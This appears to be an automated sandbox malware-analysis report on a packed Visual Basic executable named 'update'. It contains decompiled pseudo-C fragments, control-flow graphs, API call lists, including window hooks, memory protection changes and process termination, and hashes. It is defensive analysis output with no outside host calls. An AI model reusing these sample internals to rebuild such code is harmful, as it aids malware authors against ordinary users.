                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 40 401358-401380 #100
                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                        			_entry_(signed int __eax, intOrPtr __ebx, intOrPtr* __ecx, void* __edx, void* __fp0) {
                                                                                                                                        				intOrPtr* _t5;
                                                                                                                                        
                                                                                                                                        				_push("VB5!6&*"); // executed
                                                                                                                                        				L00401350(); // executed
                                                                                                                                        				 *__eax =  *__eax + __eax;
                                                                                                                                        				 *__eax =  *__eax + __eax;
                                                                                                                                        				 *__eax =  *__eax + __eax;
                                                                                                                                        				 *__eax =  *__eax ^ __eax;
                                                                                                                                        				 *__eax =  *__eax + __eax;
                                                                                                                                        				_t5 = __eax + 1;
                                                                                                                                        				 *_t5 =  *_t5 + _t5;
                                                                                                                                        				 *_t5 =  *_t5 + _t5;
                                                                                                                                        				 *_t5 =  *_t5 + _t5;
                                                                                                                                        				 *((intOrPtr*)(__ecx + 0x53)) =  *((intOrPtr*)(__ecx + 0x53)) + __edx;
                                                                                                                                        				_push(__ebx);
                                                                                                                                        				asm("out dx, eax");
                                                                                                                                        				 *__ecx = __ebx;
                                                                                                                                        				return _t5;
                                                                                                                                        			}





                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361064141.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000003.00000002.360921697.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000003.00000002.361064141.0000000000406000.00000020.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000003.00000002.361064141.0000000000473000.00000020.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000003.00000002.361209641.000000000047E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000003.00000002.361215792.000000000047F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: #100
                                                                                                                                        • String ID: VB5!6&*
                                                                                                                                        • API String ID: 1341478452-3593831657
                                                                                                                                        • Opcode ID: 31bc58e73505d0b6af78f78763621d0c83ee7d4447795e39a172d3ed1b11426b
                                                                                                                                        • Instruction ID: 0c2475f126dc65154f13c8d8fd8941998392aaa8cc0116460550a9ea45ec6501
                                                                                                                                        • Opcode Fuzzy Hash: 31bc58e73505d0b6af78f78763621d0c83ee7d4447795e39a172d3ed1b11426b
                                                                                                                                        • Instruction Fuzzy Hash: 7FE02486A4E3C01EE70722718A206853FB14CA3A8939E85EBC4C1DE5B7D95E080AC366
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 41 7b16d9-7b183c call 7b1233 45 7b1842-7b185c 41->45 47 7b1862-7b186d 45->47 48 7b19a6-7b19ad 45->48 47->48 49 7b1873-7b1878 47->49 50 7b1bef-7b1bf7 TerminateProcess 48->50 51 7b19b3 call 7b1bd7 48->51 52 7b187e-7b1883 49->52 53 7b1aa3-7b1af5 call 7b1b84 call 7b1bd7 49->53 57 7b19b8 51->57 55 7b1bf9-7b3092 call 7b1c01 call 7b1b6b call 7b2422 52->55 56 7b1889-7b1bb6 52->56 72 7b1b32 53->72 73 7b1af7-7b1b26 53->73 56->57 57->45 72->57 78 7b1b28 73->78 78->72
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361280175.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ed5f2bfe9ad2cc52703c59514bf09e8be89a55102bdfc7bff957c377021ca448
                                                                                                                                        • Instruction ID: e1d72c2f872cefc04f909b6d2e775c3f94b11102f0847e80ea711fda461399a4
                                                                                                                                        • Opcode Fuzzy Hash: ed5f2bfe9ad2cc52703c59514bf09e8be89a55102bdfc7bff957c377021ca448
                                                                                                                                        • Instruction Fuzzy Hash: 7441D370200285EFEB29DF28CCA9FE9B7A2FF09304F904214F51DCB191DB38A8908B55
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 85 7b1bdb-7b1bea 86 7b1bed-7b1bf7 TerminateProcess 85->86 87 7b1bec 85->87 87->86
                                                                                                                                        APIs
                                                                                                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,007B325A), ref: 007B1BF3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361280175.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProcessTerminate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 560597551-0
                                                                                                                                        • Opcode ID: 70a9c7429159008ca5cd0aa7f8df2603c9f3f12f56bb60d4a04b83138df95abe
                                                                                                                                        • Instruction ID: e107afb31a7964d74051ceb81a04056cd5e2bb385b085ea32f0c9f96a8bf0560
                                                                                                                                        • Opcode Fuzzy Hash: 70a9c7429159008ca5cd0aa7f8df2603c9f3f12f56bb60d4a04b83138df95abe
                                                                                                                                        • Instruction Fuzzy Hash: 91D0C7B2744245DFC74306B49C187C837D05F63275F5D0192A411CF0E1F1584D495711
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 110 401f68-401f6f 111 401f71 110->111 112 401f73-401f78 110->112 111->112 113 401f7f 112->113 113->113
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361064141.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000003.00000002.360921697.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000003.00000002.361064141.0000000000406000.00000020.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000003.00000002.361064141.0000000000473000.00000020.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000003.00000002.361209641.000000000047E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000003.00000002.361215792.000000000047F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ba810618c05d5d355356758522a818632ffdf4ea8224dc9a9e95ea5d955d483e
                                                                                                                                        • Instruction ID: 140511b50e188c0989283d9b0a096077cd6ab4819ba8abac8917961ea5c1297b
                                                                                                                                        • Opcode Fuzzy Hash: ba810618c05d5d355356758522a818632ffdf4ea8224dc9a9e95ea5d955d483e
                                                                                                                                        • Instruction Fuzzy Hash: 69B01220394043AAE71052648C018221180E2083C03240D73F059F61F0CB38CD40413E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 156 7b2453-7b2462 GetPEB 157 7b2464-7b2468 156->157 157->157 158 7b246a-7b246d 157->158 159 7b2472-7b2475 158->159 160 7b2481-7b2495 159->160 161 7b2477-7b247f 159->161 162 7b2496-7b249a 160->162 161->159 162->162 163 7b249c-7b24a0 162->163 163->162 164 7b24a2-7b24a6 163->164 165 7b24a8-7b267d 164->165 166 7b24b5-7b3fef call 7b24be 164->166
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361280175.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Z2{
                                                                                                                                        • API String ID: 0-3033370289
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361280175.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2706961497-0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361280175.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361280175.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                        			E0047CB24(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8) {
                                                                                                                                        				intOrPtr _v8;
                                                                                                                                        				intOrPtr _v12;
                                                                                                                                        				char _v36;
                                                                                                                                        				intOrPtr _v40;
                                                                                                                                        				void* _v44;
                                                                                                                                        				void* _v48;
                                                                                                                                        				char _v64;
                                                                                                                                        				intOrPtr _v68;
                                                                                                                                        				void* _v72;
                                                                                                                                        				intOrPtr _v76;
                                                                                                                                        				intOrPtr _v84;
                                                                                                                                        				long long _v92;
                                                                                                                                        				intOrPtr _v96;
                                                                                                                                        				char _v100;
                                                                                                                                        				signed int _v104;
                                                                                                                                        				char _v108;
                                                                                                                                        				char _v116;
                                                                                                                                        				char _v124;
                                                                                                                                        				intOrPtr _v132;
                                                                                                                                        				char _v140;
                                                                                                                                        				intOrPtr _v148;
                                                                                                                                        				char _v156;
                                                                                                                                        				void* _v176;
                                                                                                                                        				signed int _v180;
                                                                                                                                        				intOrPtr* _v184;
                                                                                                                                        				signed int _v188;
                                                                                                                                        				signed int _v196;
                                                                                                                                        				intOrPtr* _v200;
                                                                                                                                        				signed int _v204;
                                                                                                                                        				signed int _v208;
                                                                                                                                        				char* _t84;
                                                                                                                                        				short _t88;
                                                                                                                                        				char* _t91;
                                                                                                                                        				signed int _t97;
                                                                                                                                        				signed int _t102;
                                                                                                                                        				char* _t108;
                                                                                                                                        				char* _t116;
                                                                                                                                        				intOrPtr _t136;
                                                                                                                                        				char _t143;
                                                                                                                                        				long long _t144;
                                                                                                                                        
                                                                                                                                        				_push(0x4011a6);
                                                                                                                                        				_push( *[fs:0x0]);
                                                                                                                                        				 *[fs:0x0] = _t136;
                                                                                                                                        				L004011A0();
                                                                                                                                        				_v12 = _t136;
                                                                                                                                        				_v8 = 0x401190;
                                                                                                                                        				L0040125A();
                                                                                                                                        				_v100 = 0x81f1f2;
                                                                                                                                        				if(0 != 0) {
                                                                                                                                        					_push(1);
                                                                                                                                        					L00401254();
                                                                                                                                        					_v84 = 0;
                                                                                                                                        				}
                                                                                                                                        				_t84 =  &_v64;
                                                                                                                                        				_push(_t84);
                                                                                                                                        				L0040124E();
                                                                                                                                        				_v68 = _t84;
                                                                                                                                        				_v148 = _v40;
                                                                                                                                        				_v156 = 0x8008;
                                                                                                                                        				_push( &_v124);
                                                                                                                                        				L004012BA();
                                                                                                                                        				_push( &_v156);
                                                                                                                                        				_t88 =  &_v124;
                                                                                                                                        				_push(_t88);
                                                                                                                                        				L00401248();
                                                                                                                                        				_v176 = _t88;
                                                                                                                                        				L004012B4();
                                                                                                                                        				if(_v176 != 0) {
                                                                                                                                        					L0040125A();
                                                                                                                                        				}
                                                                                                                                        				_push(0);
                                                                                                                                        				_push(0xffffffff);
                                                                                                                                        				_push( &_v36);
                                                                                                                                        				_push(L"Volver");
                                                                                                                                        				_t91 =  &_v124;
                                                                                                                                        				_push(_t91);
                                                                                                                                        				L0040129C();
                                                                                                                                        				L004012DE();
                                                                                                                                        				_t143 =  *0x401188;
                                                                                                                                        				L00401242();
                                                                                                                                        				_v76 = _t91;
                                                                                                                                        				if( *0x47e4f8 != 0) {
                                                                                                                                        					_v200 = 0x47e4f8;
                                                                                                                                        				} else {
                                                                                                                                        					_push(0x47e4f8);
                                                                                                                                        					_push(0x402a34);
                                                                                                                                        					L00401308();
                                                                                                                                        					_v200 = 0x47e4f8;
                                                                                                                                        				}
                                                                                                                                        				_v176 =  *_v200;
                                                                                                                                        				_t97 =  *((intOrPtr*)( *_v176 + 0x14))(_v176,  &_v108);
                                                                                                                                        				asm("fclex");
                                                                                                                                        				_v180 = _t97;
                                                                                                                                        				if(_v180 >= 0) {
                                                                                                                                        					_v204 = _v204 & 0x00000000;
                                                                                                                                        				} else {
                                                                                                                                        					_push(0x14);
                                                                                                                                        					_push(0x402a24);
                                                                                                                                        					_push(_v176);
                                                                                                                                        					_push(_v180);
                                                                                                                                        					L00401302();
                                                                                                                                        					_v204 = _t97;
                                                                                                                                        				}
                                                                                                                                        				_v184 = _v108;
                                                                                                                                        				_t102 =  *((intOrPtr*)( *_v184 + 0x50))(_v184,  &_v104);
                                                                                                                                        				asm("fclex");
                                                                                                                                        				_v188 = _t102;
                                                                                                                                        				if(_v188 >= 0) {
                                                                                                                                        					_v208 = _v208 & 0x00000000;
                                                                                                                                        				} else {
                                                                                                                                        					_push(0x50);
                                                                                                                                        					_push(0x402a44);
                                                                                                                                        					_push(_v184);
                                                                                                                                        					_push(_v188);
                                                                                                                                        					L00401302();
                                                                                                                                        					_v208 = _t102;
                                                                                                                                        				}
                                                                                                                                        				_v196 = _v104;
                                                                                                                                        				_v104 = _v104 & 0x00000000;
                                                                                                                                        				L00401320();
                                                                                                                                        				_t116 =  &_v108;
                                                                                                                                        				L004012F0();
                                                                                                                                        				_v132 = 1;
                                                                                                                                        				_v140 = 2;
                                                                                                                                        				_v116 = 1;
                                                                                                                                        				_v124 = 2;
                                                                                                                                        				_push( &_v140);
                                                                                                                                        				_push( &_v124);
                                                                                                                                        				asm("fld1");
                                                                                                                                        				_push(_t116);
                                                                                                                                        				_push(_t116);
                                                                                                                                        				_v100 = _t143;
                                                                                                                                        				asm("fld1");
                                                                                                                                        				_push(_t116);
                                                                                                                                        				_push(_t116);
                                                                                                                                        				_v108 = _t143;
                                                                                                                                        				_t144 =  *0x401180;
                                                                                                                                        				_push(_t116);
                                                                                                                                        				_push(_t116);
                                                                                                                                        				_v116 = _t144;
                                                                                                                                        				L0040123C();
                                                                                                                                        				_v92 = _t144;
                                                                                                                                        				_push( &_v140);
                                                                                                                                        				_push( &_v124);
                                                                                                                                        				_push(2);
                                                                                                                                        				L00401260();
                                                                                                                                        				_v116 = 0x37;
                                                                                                                                        				_v124 = 2;
                                                                                                                                        				_t108 =  &_v124;
                                                                                                                                        				_push(_t108);
                                                                                                                                        				_push(1);
                                                                                                                                        				_push(_v96);
                                                                                                                                        				L00401236();
                                                                                                                                        				L00401320();
                                                                                                                                        				L004012B4();
                                                                                                                                        				asm("wait");
                                                                                                                                        				_push(0x47cdfd);
                                                                                                                                        				L004012B4();
                                                                                                                                        				L00401284();
                                                                                                                                        				L00401284();
                                                                                                                                        				L00401284();
                                                                                                                                        				L004012B4();
                                                                                                                                        				L00401284();
                                                                                                                                        				L00401284();
                                                                                                                                        				return _t108;
                                                                                                                                        			}

                                                                                                                                        APIs
                                                                                                                                        • __vbaChkstk.MSVBVM60(?,004011A6), ref: 0047CB41
                                                                                                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,004011A6), ref: 0047CB59
                                                                                                                                        • #571.MSVBVM60(00000001), ref: 0047CB6D
                                                                                                                                        • #563.MSVBVM60(?), ref: 0047CB7C
                                                                                                                                        • #610.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0047CB9B
                                                                                                                                        • __vbaVarTstEq.MSVBVM60(?,00008008,?), ref: 0047CBAB
                                                                                                                                        • __vbaFreeVar.MSVBVM60(?,00008008,?), ref: 0047CBBA
                                                                                                                                        • __vbaStrCopy.MSVBVM60(?,00008008,?), ref: 0047CBD2
                                                                                                                                        • #711.MSVBVM60(?,Volver,?,000000FF,00000000,?,00008008,?), ref: 0047CBE8
                                                                                                                                        • __vbaVarMove.MSVBVM60(?,Volver,?,000000FF,00000000,?,00008008,?), ref: 0047CBF3
                                                                                                                                        • __vbaR8IntI4.MSVBVM60(?,Volver,?,000000FF,00000000,?,00008008,?), ref: 0047CBFE
                                                                                                                                        • __vbaNew2.MSVBVM60(00402A34,0047E4F8,?,Volver,?,000000FF,00000000,?,00008008,?), ref: 0047CC19
                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402A24,00000014,?,?,?,?,Volver,?,000000FF,00000000,?,00008008,?), ref: 0047CC7B
                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402A44,00000050,?,?,?,?,Volver,?,000000FF,00000000,?,00008008,?), ref: 0047CCD1
                                                                                                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,Volver,?,000000FF,00000000,?,00008008,?), ref: 0047CCFB
                                                                                                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,Volver,?,000000FF,00000000,?,00008008,?), ref: 0047CD03
                                                                                                                                        • #678.MSVBVM60(?,?,?,?,?,?,00000002,00000002,?,?,?,?,?,?,Volver,?), ref: 0047CD4B
                                                                                                                                        • __vbaFreeVarList.MSVBVM60(00000002,00000002,00000002,?,?,?,?,?,?,00000002,00000002), ref: 0047CD60
                                                                                                                                        • #631.MSVBVM60(?,00000001,00000002), ref: 0047CD7F
                                                                                                                                        • __vbaStrMove.MSVBVM60(?,00000001,00000002), ref: 0047CD89
                                                                                                                                        • __vbaFreeVar.MSVBVM60(?,00000001,00000002), ref: 0047CD91
                                                                                                                                        • __vbaFreeVar.MSVBVM60(0047CDFD,?,00000001,00000002), ref: 0047CDC7
                                                                                                                                        • __vbaFreeStr.MSVBVM60(0047CDFD,?,00000001,00000002), ref: 0047CDCF
                                                                                                                                        • __vbaFreeStr.MSVBVM60(0047CDFD,?,00000001,00000002), ref: 0047CDD7
                                                                                                                                        • __vbaFreeStr.MSVBVM60(0047CDFD,?,00000001,00000002), ref: 0047CDDF
                                                                                                                                        • __vbaFreeVar.MSVBVM60(0047CDFD,?,00000001,00000002), ref: 0047CDE7
                                                                                                                                        • __vbaFreeStr.MSVBVM60(0047CDFD,?,00000001,00000002), ref: 0047CDEF
                                                                                                                                        • __vbaFreeStr.MSVBVM60(0047CDFD,?,00000001,00000002), ref: 0047CDF7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361064141.0000000000473000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000003.00000002.360921697.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000003.00000002.361064141.0000000000401000.00000020.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000003.00000002.361064141.0000000000406000.00000020.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000003.00000002.361209641.000000000047E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000003.00000002.361215792.000000000047F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __vba$Free$Move$CheckCopyHresult$#563#571#610#631#678#711ChkstkListNew2
                                                                                                                                        • String ID: 7$Dishevelled7$Volver
                                                                                                                                        • API String ID: 1917360420-2773989111
                                                                                                                                        • Opcode ID: 2fe2dd6fa13432f09fa8f6a7231816c77a5ad3aca185559f317abd92f98402e4
                                                                                                                                        • Instruction ID: 8675a4aef6c55bb5a6538cd37236a5ef74517b6ab3f6460b38bc4d9df03f72c4
                                                                                                                                        • Opcode Fuzzy Hash: 2fe2dd6fa13432f09fa8f6a7231816c77a5ad3aca185559f317abd92f98402e4
                                                                                                                                        • Instruction Fuzzy Hash: 6771EA719002189FEB15EBA1CC85FDDBBB9BF08304F5081AEE509B71A1DB785A89CF15
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 42%
                                                                                                                                        			E0047C9CD(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                                                                                        				intOrPtr _v8;
                                                                                                                                        				intOrPtr _v12;
                                                                                                                                        				char _v70;
                                                                                                                                        				intOrPtr _v72;
                                                                                                                                        				void* _v88;
                                                                                                                                        				intOrPtr _v96;
                                                                                                                                        				char _v104;
                                                                                                                                        				char _v120;
                                                                                                                                        				char _v136;
                                                                                                                                        				intOrPtr _v144;
                                                                                                                                        				char _v152;
                                                                                                                                        				char _v168;
                                                                                                                                        				char* _v176;
                                                                                                                                        				char _v184;
                                                                                                                                        				intOrPtr _v208;
                                                                                                                                        				char _v216;
                                                                                                                                        				char* _t33;
                                                                                                                                        				char* _t36;
                                                                                                                                        				char* _t38;
                                                                                                                                        				char* _t43;
                                                                                                                                        				intOrPtr _t55;
                                                                                                                                        
                                                                                                                                        				_push(0x4011a6);
                                                                                                                                        				_push( *[fs:0x0]);
                                                                                                                                        				 *[fs:0x0] = _t55;
                                                                                                                                        				L004011A0();
                                                                                                                                        				_v12 = _t55;
                                                                                                                                        				_v8 = 0x401170;
                                                                                                                                        				_v96 = 0x80020004;
                                                                                                                                        				_v104 = 0xa;
                                                                                                                                        				_v176 =  &_v70;
                                                                                                                                        				_v184 = 0x4002;
                                                                                                                                        				_push(1);
                                                                                                                                        				_push(1);
                                                                                                                                        				_push( &_v104);
                                                                                                                                        				_push( &_v184);
                                                                                                                                        				_t33 =  &_v120;
                                                                                                                                        				_push(_t33);
                                                                                                                                        				L00401272();
                                                                                                                                        				_v208 = 0x402aa4;
                                                                                                                                        				_v216 = 8;
                                                                                                                                        				_push(_v72);
                                                                                                                                        				L00401266();
                                                                                                                                        				L00401320();
                                                                                                                                        				_push(_t33);
                                                                                                                                        				L0040126C();
                                                                                                                                        				_v144 = _t33;
                                                                                                                                        				_v152 = 8;
                                                                                                                                        				_push( &_v120);
                                                                                                                                        				_push( &_v216);
                                                                                                                                        				_t36 =  &_v136;
                                                                                                                                        				_push(_t36);
                                                                                                                                        				L00401278();
                                                                                                                                        				_push(_t36);
                                                                                                                                        				_push( &_v152);
                                                                                                                                        				_t38 =  &_v168;
                                                                                                                                        				_push(_t38);
                                                                                                                                        				L00401278();
                                                                                                                                        				_push(_t38);
                                                                                                                                        				L004012C0();
                                                                                                                                        				L00401320();
                                                                                                                                        				L00401284();
                                                                                                                                        				_push( &_v168);
                                                                                                                                        				_push( &_v152);
                                                                                                                                        				_push( &_v136);
                                                                                                                                        				_push( &_v120);
                                                                                                                                        				_t43 =  &_v104;
                                                                                                                                        				_push(_t43);
                                                                                                                                        				_push(5);
                                                                                                                                        				L00401260();
                                                                                                                                        				_push(0x47cb15);
                                                                                                                                        				return _t43;
                                                                                                                                        			}

























                                                                                                                                        APIs
                                                                                                                                        • __vbaChkstk.MSVBVM60(?,004011A6), ref: 0047C9EA
                                                                                                                                        • #660.MSVBVM60(?,00004002,0000000A,00000001,00000001), ref: 0047CA30
                                                                                                                                        • __vbaStrI2.MSVBVM60(?,?,?,?,?,00004002,0000000A,00000001,00000001), ref: 0047CA4C
                                                                                                                                        • __vbaStrMove.MSVBVM60(?,?,?,?,?,00004002,0000000A,00000001,00000001), ref: 0047CA56
                                                                                                                                        • #713.MSVBVM60(00000000,?,?,?,?,?,00004002,0000000A,00000001,00000001), ref: 0047CA5C
                                                                                                                                        • __vbaVarCat.MSVBVM60(?,00000008,?,00000000,?,?,?,?,?,00004002,0000000A,00000001,00000001), ref: 0047CA83
                                                                                                                                        • __vbaVarCat.MSVBVM60(?,00000008,00000000,?,00000008,?,00000000,?,?,?,?,?,00004002,0000000A,00000001,00000001), ref: 0047CA97
                                                                                                                                        • __vbaStrVarMove.MSVBVM60(00000000,?,00000008,00000000,?,00000008,?,00000000,?,?,?,?,?,00004002,0000000A,00000001), ref: 0047CA9D
                                                                                                                                        • __vbaStrMove.MSVBVM60(00000000,?,00000008,00000000,?,00000008,?,00000000,?,?,?,?,?,00004002,0000000A,00000001), ref: 0047CAA9
                                                                                                                                        • __vbaFreeStr.MSVBVM60(00000000,?,00000008,00000000,?,00000008,?,00000000,?,?,?,?,?,00004002,0000000A,00000001), ref: 0047CAB1
                                                                                                                                        • __vbaFreeVarList.MSVBVM60(00000005,0000000A,?,?,00000008,?,00000000,?,00000008,00000000,?,00000008,?,00000000,?), ref: 0047CAD5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361064141.0000000000473000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000003.00000002.360921697.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000003.00000002.361064141.0000000000401000.00000020.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000003.00000002.361064141.0000000000406000.00000020.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000003.00000002.361209641.000000000047E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                        • Associated: 00000003.00000002.361215792.000000000047F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __vba$Move$Free$#660#713ChkstkList
                                                                                                                                        • String ID: 0G
                                                                                                                                        • API String ID: 3935290791-2664342302
                                                                                                                                        • Opcode ID: 19e66fbb10b2bb43d777cdc754d8bacc1834d9e39c83e46fdc65c78a7ba013b2
                                                                                                                                        • Instruction ID: a6c87352a10bd0c29c3dfee56bbfc3ddada56146144d5d3d0ad4118cfd3d6f8d
                                                                                                                                        • Opcode Fuzzy Hash: 19e66fbb10b2bb43d777cdc754d8bacc1834d9e39c83e46fdc65c78a7ba013b2
                                                                                                                                        • Instruction Fuzzy Hash: 2831CFB1900218AADB11DBA1CD45FCEB7BCAB08744F5041ABB209F7191DB785B488F65
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:1.1%
                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:28
                                                                                                                                        Total number of Limit Nodes:3
                                                                                                                                        execution_graph 24957 340af3c 24958 340af44 24957->24958 24960 340af80 24958->24960 24961 34095fc 24958->24961 24963 340960b 24961->24963 24964 3409621 24961->24964 24963->24964 24965 34095b4 24963->24965 24964->24960 24966 34095c4 24965->24966 24968 34095e0 24965->24968 24969 340a82c 24966->24969 24968->24964 24970 340a86d 24969->24970 24973 340a708 24970->24973 24972 340a8a6 24972->24968 24975 340a729 24973->24975 24974 340a7a4 24974->24972 24975->24974 24979 3409df4 24975->24979 24977 340a7c0 24977->24974 24978 3409df4 6 API calls 24977->24978 24978->24974 24980 3409e17 24979->24980 24982 3409e20 24980->24982 24983 3409cd8 6 API calls 24980->24983 24982->24977 24983->24982 24984 3499904 24985 3499937 24984->24985 24986 3499917 SetWindowsHookExW 24984->24986 24987 3499941 SetWindowsHookExW 24985->24987 24988 3499975 KiUserCallbackDispatcher 24985->24988 24986->24985 24987->24988 24989 3499963 24988->24989 24990 3499991 24988->24990 24989->24988 24989->24990

                                                                                                                                        Control-flow Graph

